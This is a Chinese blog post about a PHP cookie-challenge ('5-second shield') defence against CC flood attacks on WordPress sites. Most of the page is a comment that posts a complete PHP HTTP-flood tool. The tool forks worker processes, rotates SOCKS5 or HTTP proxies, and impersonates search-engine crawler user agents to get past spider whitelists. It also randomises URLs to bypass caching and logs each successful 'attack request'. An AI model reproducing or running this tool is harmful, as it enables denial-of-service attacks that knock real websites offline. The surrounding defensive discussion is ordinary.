5秒盾防CC(PHP通用代码)

您的主题 Wordpress - 5秒盾防CC(PHP通用代码) 被 mtx 关闭,刚才的帖子被关闭了;

重新发一帖

这是个类似Cloudflare的防 cc 功能,利用的是五秒盾的原理,经过检测得到 cookie 的浏览器才能正常的访问你的网站了,当然了,面对数以万计的肉鸡,这代码还是无能为力的,所以说做人就要低调,别到处装逼,到时候被打了惨的还是自己。

代码见签名网站

WordPress 上传到主题/template/cc.php ;

调用代码
PHP 通用调用,在头部或主要文件内文件加入:
  1. <?php include 'cc.php'; ?>
复制代码

WordPress 调用,主题/header.php 第一行添加代码:
  1. <?php get_template_part( 'template/cc' ); ?>
复制代码


搜索引擎蜘蛛已经过滤,不影响收录,还有未加上的可以自己补充。平时没攻击的时候建议不要开启,影响网站体验,配合《Nginx lua waf 简单防御 CC 攻击》效果更佳。

广西网友:打到FPM了,只能说是基础缓解,最好在nginx上用lua写
陕西网友:让我们来出一个对策

CURLPROXY_SOCKS5改为CURLPROXY_HTTP即可食用http代理
改为CURLPROXY_SOCKS4可使用socks4代理

  1. <?PHP
  2. ini_set('memory_limit', '-1');

  3. $ua = [
  4.     "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
  5.     "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)",
  6.     "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)",
  7.     "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)",
  8.     "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
  9.     "Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)",
  10.     "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)",
  11.     "Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)",
  12.     "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)",
  13.     "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
  14.     "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)",
  15.     "Googlebot-Image/1.0",
  16.     "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0 (via ggpht.com GoogleImageProxy)",
  17.     "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)",
  18.     "msnbot/1.0 (+http://search.msn.com/msnbot.htm)",
  19.     "msnbot/2.0b (+http://search.msn.com/msnbot.htm)",
  20.     "Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)",
  21.     "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)",
  22.     "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b",
  23.     "Mozilla/5.0 (compatible; AhrefsBot/5.1; +http://ahrefs.com/robot/)",
  24.     "msnbot/1.1 (+http://search.msn.com/msnbot.htm)",
  25.     "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b",
  26.     "Baiduspider+(+http://www.baidu.com/search/spider.htm)",
  27.     "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)",
  28.     "FBexternalhit/1.1 (+http://www.FB.com/externalhit_uatext.php)",
  29.     "Googlebot/2.1 (+http://www.google.com/bot.html)",
  30.     "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)",
  31.     "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)",
  32.     "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)",
  33.     "msnbot/0.01 (+http://search.msn.com/msnbot.htm)",
  34.     "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)",
  35.     "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)",
  36.     "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)",
  37.     "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36",
  38.     "Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
  39.     "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon",
  40.     "msnbot/0.3 (+http://search.msn.com/msnbot.htm)",
  41.     "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)",
  42.     "Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) VoilaBot BETA 1.2 (http://www.voila.com/)",
  43.     "YahooMailProxy; https://help.yahoo.com/kb/yahoo-mail-proxy-SLN28749.html",
  44.     "Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
  45.     "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)",
  46.     "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)",
  47.     "ia_archiver",
  48.     "Mozilla/5.0 (compatible; AhrefsBot/4.0; +http://ahrefs.com/robot/)",
  49.     "Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)",
  50.     "FAST Enterprise Crawler 6 / Scirus scirus-crawler@fast.no; http://www.scirus.com/srsapp/contactus/",
  51.     "Pinterest/0.2 (+http://www.pinterest.com/)",
  52.     "FAST MetaWeb Crawler (helpdesk at fastsearch dot com)",
  53.     "Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Exabot-Thumbnails)",
  54. ];

  55. function partition($list, $p)
  56. {
  57.     $listlen   = count($list);
  58.     $partlen   = floor($listlen / $p);
  59.     $partrem   = $listlen % $p;
  60.     $partition = array();
  61.     $mark      = 0;
  62.     for ($px = 0; $px < $p; $px++) {
  63.         $incr           = ($px < $partrem) ? $partlen + 1 : $partlen;
  64.         $partition[$px] = array_slice($list, $mark, $incr);
  65.         $mark += $incr;
  66.     }
  67.     return $partition;
  68. }

  69. if ($argc < 6) {
  70.     echo "normal\nVersion: 0.1\n";
  71.     echo "Usage: php {$argv[0]} <url> <reflection file> <threads> <method(get or post)> <time> [request data]\n";
  72.     echo "Power by Kagurazaka Shira\n";
  73.     exit;
  74. }

  75. if (!file_exists("$argv[2]")) {
  76.     exit("Invalid input file!\n");
  77. }

  78. $method = strtolower($argv[4]);
  79. if ($method != 'get' && $method != 'post') {
  80.     exit("Invalid input method!\n");
  81. }
  82. $data = $argv[6] ?? ''; //请求参数

  83. if ($method == 'get' && !empty($data)) {
  84.     $url = strpos($url, '?') ? ($url . '&' . $data) : ($url . '?' . $data);
  85. }

  86. $url        = $argv[1]; //url
  87. $array      = file($argv[2], FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); //列表
  88. $childcount = $argv[3]; //线程数
  89. $array      = array_unique($array);
  90. $part       = array();
  91. $part       = partition($array, $childcount); //列表分割

  92. $end_time = time() + intval($argv[5]);

  93. for ($i = 0; $i < $childcount; $i++) {
  94.     $pid = pcntl_fork();
  95.     if ($pid == -1) {
  96.         echo "Forking failed on loop $i\n";
  97.         exit;
  98.     } else if ($pid) {
  99.         continue;
  100.     } else {
  101.         while ($end_time > time()) {
  102.             foreach ($part[$i] as $ip) {
  103.                 $rand_num = mt_rand();
  104.                 $rand_str = md5($rand_num);
  105.                 $url      = str_replace(['{:rand_num}', '{:rand_str}'], [$rand_num, $rand_str], $url);
  106.                 // var_dump($url);
  107.                 $curl = curl_init();

  108.                 curl_setopt_array($curl, array(
  109.                     CURLOPT_URL            => $url,
  110.                     CURLOPT_RETURNTRANSFER => true,
  111.                     CURLOPT_SSL_VERIFYHOST => false,
  112.                     CURLOPT_SSL_VERIFYPEER => false,
  113.                     CURLOPT_ENCODING       => "",
  114.                     CURLOPT_PROXYTYPE      => CURLPROXY_SOCKS5,
  115.                     CURLOPT_PROXY          => $ip,
  116.                     CURLOPT_MAXREDIRS      => 10,
  117.                     CURLOPT_TIMEOUT        => 30,
  118.                     CURLOPT_HTTP_VERSION   => CURL_HTTP_VERSION_1_1,
  119.                     // CURLOPT_CUSTOMREQUEST  => "GET",
  120.                     CURLOPT_HTTPHEADER     => array(
  121.                         "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
  122.                         // "accept-encoding: deflate, br",
  123.                         "accept-language: zh-TW,zh-HK;q=0.9,zh-CN;q=0.8,zh;q=0.7,ja-JP;q=0.6,ja;q=0.5,en-US;q=0.4,en-HK;q=0.3,en;q=0.2,ru;q=0.1,fa;q=0.1",
  124.                         "cache-control: no-cache",
  125.                         "dnt: 1",
  126.                         "pragma: no-cache",
  127.                         "upgrade-insecure-requests: 1",
  128.                         "user-agent: " . $ua[array_rand($ua)],
  129.                     ),
  130.                 ));
  131.                 if ($method == 'post' && !empty($data)) {
  132.                     $data = str_replace(['{:rand_num}', '{:rand_str}'], [$rand_num, $rand_str], $data);
  133.                     curl_setopt($curl, CURLOPT_POST, true);
  134.                     curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
  135.                 }
  136.                 $response = curl_exec($curl);
  137.                 if (empty($response)) {
  138.                     // echo "proxy {$ip} down.\n";
  139.                     continue;
  140.                 } else {
  141.                     echo "attack request use {$ip} success\n";

  142.                 }

  143.             }
  144.         }

  145.         exit;
  146.     }
  147. }
  148. for ($j = 0; $j < $childcount; $j++) {
  149.     $pid = pcntl_wait($status);
  150. }

复制代码

江苏网友:那就通过HTTP协议头中的REMOTE_ADDR、HTTP_VIA、HTTP_X_FORWARDED_FOR来判断是代理禁止访问;

或者通过WebRTC的JS,HTML5的API检测代理并禁止
重庆网友:你起码把ip加到防火墙drop掉才有效果
西藏网友:  都来到后端了 ,iptable 或者 nginx 就应该禁了  
湖北网友:反正都到你的服务器了,你禁不禁根本无所谓,攻击目的已经达到,你再去禁止,怎么说呢,就是别人打你一巴掌,你然后摸摸脸说,不疼不疼,有啥用
海南网友:又看到了大佬了
广西网友: https://www.yunloc.com/167.html

已经有Nginx_lua_waf教程了
未经允许不得转载:开心小站长 » 5秒盾防CC(PHP通用代码)

相关推荐

留言与评论(共有 0 条评论)
   
验证码: